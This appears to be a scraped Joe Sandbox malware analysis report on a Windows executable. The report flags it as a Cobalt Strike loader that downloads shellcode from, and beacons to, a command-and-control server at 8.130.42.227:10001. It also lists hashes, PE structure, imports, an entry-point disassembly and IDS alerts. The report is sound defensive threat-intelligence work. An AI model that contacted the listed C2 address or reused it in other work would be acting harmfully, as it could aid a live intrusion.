                                        http://8.130.42.227:10001/en_US/all.js:7kSftA4Eoh.exe, 00000000.00000003.2166831679.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2089166658.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2520838322.0000000000183000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2177812007.0000000000185000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://8.130.42.227:10001/en_US/all.js?7kSftA4Eoh.exe, 00000000.00000003.2357124729.0000000000182000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2335515707.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2346423893.0000000000185000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://8.130.42.227:10001/en_US/all.jsdob4k7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://8.130.42.227:10001/en_US/all.js=?7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://8.130.42.227:10001/en_US/all.jsR47kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://8.130.42.227:10001/en_US/all.jsdo7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://8.130.42.227:10001/en_US/all.jssij4s7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://127.0.0.1:%u/7kSftA4Eoh.exe, 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://8.130.42.227:10001/en_US/all.jsT7kSftA4Eoh.exe, 00000000.00000003.2188573468.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2154291765.0000000000185000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2143627230.0000000000185000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://8.130.42.227:10001/2yMeq77kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://8.130.42.227:10001/en_US/all.jsU7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://8.130.42.227:10001/en_US/all.jssi7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                8.130.42.227
                                                                		unknownSingapore
                                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1523188
                                                                Start date and time:2024-10-01 09:16:05 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 15s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:5
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:7kSftA4Eoh.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:71f8b8789a4b0ac3f057f1468579fc23.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 20
                                                                • Number of non-executed functions: 147
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                03:16:57API Interceptor14526524x Sleep call for process: 7kSftA4Eoh.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                No context

                                                                Domains

                                                                No context

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdmtgjyX9gHF.exeGet hashmaliciousQuasarBrowse
                                                                • 39.102.36.209
                                                                e4wLi4tmmo.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                • 47.120.3.3
                                                                https://ebaite.cn/Get hashmaliciousUnknownBrowse
                                                                • 120.25.112.99
                                                                SecuriteInfo.com.FileRepMalware.23518.16980.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                • 106.14.141.209
                                                                d3r1KVj317.exeGet hashmaliciousUnknownBrowse
                                                                • 112.74.185.5
                                                                http://aa5aa5aa5aa5aa44.app/Get hashmaliciousUnknownBrowse
                                                                • 59.82.132.217
                                                                http://hbyczyz.com/xrrGet hashmaliciousUnknownBrowse
                                                                • 47.108.5.198
                                                                http://www.tpckn.app/Get hashmaliciousUnknownBrowse
                                                                • 203.107.62.140
                                                                http://alibinaadi.com/.well-known/alibaba/Alibaba/index.phpGet hashmaliciousUnknownBrowse
                                                                • 59.82.33.225
                                                                cjg7obu8xR.exeGet hashmaliciousUnknownBrowse
                                                                • 112.74.185.5

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                No created / dropped files found

                                                                Static File Info

                                                                General

                                                                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                Entropy (8bit):5.225476561531618
                                                                TrID:
                                                                • Win64 Executable (generic) (12005/4) 74.80%
                                                                • Generic Win/DOS Executable (2004/3) 12.49%
                                                                • DOS Executable Generic (2002/1) 12.47%
                                                                • VXD Driver (31/22) 0.19%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                File name:7kSftA4Eoh.exe
                                                                File size:19'456 bytes
                                                                MD5:71f8b8789a4b0ac3f057f1468579fc23
                                                                SHA1:2f424692dcfb5f9fe87f1e94fd2922ab3fb2143d
                                                                SHA256:a390b03e67b809b3dd08b840e3e917eb701387309c5a8859438dc926ce62ec64
                                                                SHA512:b84f80a40a2b8a7fdb897548028df92119f7fcdfd5ed4f1f4046420886dbfb5443fa4b04ac8dd9fcb05a3daaeb0fa5f12a157240d5597ae2faaf6d2bc020e0a2
                                                                SSDEEP:192:XV7qaCF6Op1t2dobVXujRDcBaXWQjwOT/2oH3pWF8qa1Dojjgi:BqaCF31cix+Dc4zjz30FF46gi
                                                                TLSH:CD92E93FE71358E9C106D57845FB3733DCB239B385E6A72E1734D2B42E105A42EAAA14
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."...H................@............................................... ............................

                                                                File Icon

                                                                Icon Hash:90cececece8e8eb0

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x4014c0
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                DLL Characteristics:
                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                TLS Callbacks:0x401ba0
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:147442e63270e287ed57d33257638324

                                                                Entrypoint Preview

                                                                Instruction
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [00003FF5h]
                                                                mov dword ptr [eax], 00000001h
                                                                call 00007FB8792BC33Fh
                                                                call 00007FB8792BBB2Ah
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop word ptr [eax+eax+00000000h]
                                                                nop dword ptr [eax]
                                                                dec eax
                                                                sub esp, 28h
                                                                dec eax
                                                                mov eax, dword ptr [00003FC5h]
                                                                mov dword ptr [eax], 00000000h
                                                                call 00007FB8792BC30Fh
                                                                call 00007FB8792BBAFAh
                                                                nop
                                                                nop
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop word ptr [eax+eax+00000000h]
                                                                nop dword ptr [eax]
                                                                dec eax
                                                                sub esp, 28h
                                                                call 00007FB8792BD7D4h
                                                                dec eax
                                                                test eax, eax
                                                                sete al
                                                                movzx eax, al
                                                                neg eax
                                                                dec eax
                                                                add esp, 28h
                                                                ret
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                dec eax
                                                                lea ecx, dword ptr [00000009h]
                                                                jmp 00007FB8792BBE59h
                                                                nop dword ptr [eax+00h]
                                                                ret
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                nop
                                                                dec eax
                                                                jmp ecx
                                                                dec eax
                                                                arpl word ptr [00002AC2h], ax
                                                                test eax, eax
                                                                jle 00007FB8792BBEA8h
                                                                cmp dword ptr [00002ABBh], 00000000h
                                                                jle 00007FB8792BBE9Fh
                                                                dec eax
                                                                mov edx, dword ptr [00007CFEh]
                                                                dec eax
                                                                mov dword ptr [ecx+eax], edx
                                                                dec eax
                                                                mov edx, dword ptr [00007CFBh]

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x90000x8d8.idata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x60000x2b8.pdata
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x50600x28.rdata
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x92240x1e8.idata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000x20a80x22003040ba596609d0f7ba50ac030468b13eFalse0.5708869485294118data5.9208685532060095IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .data0x40000x4f00x600ebbe6bb0570cd55650f05db1b274f904False0.6516927083333334dBase III DBT, version number 0, next free block index 10, 1st item "*n\032G\236\254N\220\351\330\360|\244\252\210N\246\275\313{\373\370\350`\273\261\311c\240\367\220!\361\370\215l\256\265\325n\265\261\307c\244\343\205B\222\221\340/\370\366\2254\341\217\314a\245\267\322|\341\226\361/\367\366\2244\341\217\352X\367\354\236/\225\252\314k\244\266\321 \364\366\2254\341\226\365?\367\361\250\005\301&T\032`\217\320\270H2\244j\256\257\007z\177\004\003&\360\345\357\215\206T\232"5.844254602958452IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .rdata0x50000x9100xa00b02c91451e7abad85f4a5bbe48fd6333False0.2421875data4.472912660223878IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                .pdata0x60000x2b80x400ad5ec754cf0e204a3a3c39436081f3bcFalse0.380859375data2.9668653207491333IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                .xdata0x70000x2380x4006ce9e303fb86766d702ecb2b174cf348False0.2578125data2.6337753778508075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                                                .bss0x80000x9d00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .idata0x90000x8d80xa00ec8dedb62953693cf02784f71f75d547False0.323828125data3.7083607069283806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .CRT0xa0000x680x20052d79e9aecf5d5c3145d3ec54aa197a8False0.0703125data0.2709192282599745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .tls0xb0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
                                                                msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-01T09:16:59.037379+02002035442ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M118.130.42.22710001192.168.2.449730TCP
                                                                2024-10-01T09:17:00.947197+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497318.130.42.22710001TCP
                                                                2024-10-01T09:17:02.228973+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497328.130.42.22710001TCP
                                                                2024-10-01T09:17:03.309425+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497338.130.42.22710001TCP
                                                                2024-10-01T09:17:04.366070+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497348.130.42.22710001TCP
                                                                2024-10-01T09:17:05.519622+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497358.130.42.22710001TCP
                                                                2024-10-01T09:17:06.606342+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497368.130.42.22710001TCP
                                                                2024-10-01T09:17:07.666636+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497378.130.42.22710001TCP
                                                                2024-10-01T09:17:08.719912+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497388.130.42.22710001TCP
                                                                2024-10-01T09:17:09.790001+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497398.130.42.22710001TCP
                                                                2024-10-01T09:17:13.878848+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497408.130.42.22710001TCP
                                                                2024-10-01T09:17:14.961547+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497428.130.42.22710001TCP
                                                                2024-10-01T09:17:16.042408+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497448.130.42.22710001TCP
                                                                2024-10-01T09:17:17.115300+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497478.130.42.22710001TCP
                                                                2024-10-01T09:17:18.198314+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497498.130.42.22710001TCP
                                                                2024-10-01T09:17:19.277882+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497518.130.42.22710001TCP
                                                                2024-10-01T09:17:20.348397+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497528.130.42.22710001TCP
                                                                2024-10-01T09:17:21.432830+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497538.130.42.22710001TCP
                                                                2024-10-01T09:17:23.040968+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497548.130.42.22710001TCP
                                                                2024-10-01T09:17:24.109998+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497558.130.42.22710001TCP
                                                                2024-10-01T09:17:25.186486+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497568.130.42.22710001TCP
                                                                2024-10-01T09:17:26.245359+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497578.130.42.22710001TCP
                                                                2024-10-01T09:17:27.329221+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497588.130.42.22710001TCP
                                                                2024-10-01T09:17:28.415425+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497598.130.42.22710001TCP
                                                                2024-10-01T09:17:29.482062+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497608.130.42.22710001TCP
                                                                2024-10-01T09:17:31.128011+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497618.130.42.22710001TCP
                                                                2024-10-01T09:17:32.766854+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497628.130.42.22710001TCP
                                                                2024-10-01T09:17:33.850975+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497638.130.42.22710001TCP
                                                                2024-10-01T09:17:34.934000+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497648.130.42.22710001TCP
                                                                2024-10-01T09:17:36.009885+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497658.130.42.22710001TCP
                                                                2024-10-01T09:17:37.091878+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497668.130.42.22710001TCP
                                                                2024-10-01T09:17:38.179805+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497678.130.42.22710001TCP
                                                                2024-10-01T09:17:39.265872+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497688.130.42.22710001TCP
                                                                2024-10-01T09:17:40.358668+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497698.130.42.22710001TCP
                                                                2024-10-01T09:17:41.456699+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497708.130.42.22710001TCP
                                                                2024-10-01T09:17:42.535412+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497718.130.42.22710001TCP
                                                                2024-10-01T09:17:43.632204+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497728.130.42.22710001TCP
                                                                2024-10-01T09:17:44.697946+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497738.130.42.22710001TCP
                                                                2024-10-01T09:17:45.952669+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497748.130.42.22710001TCP
                                                                2024-10-01T09:17:47.050823+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497758.130.42.22710001TCP
                                                                2024-10-01T09:17:48.123972+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497768.130.42.22710001TCP
                                                                2024-10-01T09:17:49.197763+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497778.130.42.22710001TCP
                                                                2024-10-01T09:17:50.296179+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497788.130.42.22710001TCP
                                                                2024-10-01T09:17:51.369205+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497798.130.42.22710001TCP
                                                                2024-10-01T09:17:52.431620+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497808.130.42.22710001TCP
                                                                2024-10-01T09:17:53.539482+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497828.130.42.22710001TCP
                                                                2024-10-01T09:17:54.689844+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497838.130.42.22710001TCP
                                                                2024-10-01T09:17:55.758444+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497848.130.42.22710001TCP
                                                                2024-10-01T09:17:56.837786+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497858.130.42.22710001TCP
                                                                2024-10-01T09:17:58.517597+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497868.130.42.22710001TCP
                                                                2024-10-01T09:17:59.583634+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497878.130.42.22710001TCP
                                                                2024-10-01T09:18:00.651525+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497888.130.42.22710001TCP
                                                                2024-10-01T09:18:01.725930+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497898.130.42.22710001TCP
                                                                2024-10-01T09:18:02.821096+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497908.130.42.22710001TCP
                                                                2024-10-01T09:18:03.911927+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497918.130.42.22710001TCP
                                                                2024-10-01T09:18:04.981938+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497928.130.42.22710001TCP
                                                                2024-10-01T09:18:06.064082+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497938.130.42.22710001TCP
                                                                2024-10-01T09:18:07.142989+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497948.130.42.22710001TCP
                                                                2024-10-01T09:18:08.247427+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497958.130.42.22710001TCP
                                                                2024-10-01T09:18:09.322269+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497968.130.42.22710001TCP
                                                                2024-10-01T09:18:10.406359+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497978.130.42.22710001TCP
                                                                2024-10-01T09:18:11.475283+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497988.130.42.22710001TCP
                                                                2024-10-01T09:18:12.557418+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4497998.130.42.22710001TCP
